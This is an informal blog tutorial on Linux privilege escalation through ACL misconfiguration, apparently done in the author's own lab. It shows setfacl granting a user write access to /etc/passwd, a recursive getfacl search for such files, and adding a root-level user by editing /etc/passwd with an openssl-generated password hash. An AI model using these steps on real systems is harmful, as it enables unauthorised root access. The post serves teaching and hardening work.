I am writing this blog because I didn’t find much resources on ACL privilege escalation
ACL is special permission given to specific user on XFS file system
First I will show you how we can configure ACL and make our system vulnerable then we will exploit to get superuser
Configuration
I am setting this permission on /etc/passwd
syntax
# setfacl -m “u:username:permissions” file.txt
so the permission which I am setting for passwd are
# setfacl -m "u:tanishq:rwx" /etc/passwd
now our work is done if you want to remove the permission you can use the command I am giving down below
# setfacl -b /etc/passwd
LETS EXPLOIT
for exploiting I am using a normal user with no special sudo powers
for finding out ACL power files use the command
$ rm /tmp/getfacl.txt; getfacl -R -s -p / 2>/dev/null > /tmp/getfacl.txt; cat /tmp/getfacl.txt | grep -v "getfacl:"
it will result files with ACL permission now try to find which can help us in some way to escalate

here at the end see our current user have permission to write in passwd
now we will try to create a new user and give it our custom password
$ vim /etc/passwd

here I have created a new user with the name of root_me
$ vim /etc/passwd
and for password I used openssl command
MAIN HOST# openssl passwd 123
now save the file
and switch the user
$ su - root_me

here we got root with ACL misconfiguration
If you are still confuse or have a better way dm me on twitter root_tanishq
Bye :D